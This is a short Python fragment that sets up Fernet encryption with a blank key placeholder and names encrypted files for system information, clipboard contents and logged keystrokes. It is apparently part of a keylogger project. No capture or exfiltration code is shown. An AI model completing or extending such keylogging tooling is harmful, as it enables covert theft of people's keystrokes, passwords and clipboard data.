from cryptography.fernet import Fernet

key = " " # Paste Your Key which is generated by Gernerate Key file.
system_information_e = 'e_system.txt'
clipboard_information_e = 'e_clipboard.txt'
keys_information_e = 'e_keys_logged.txt'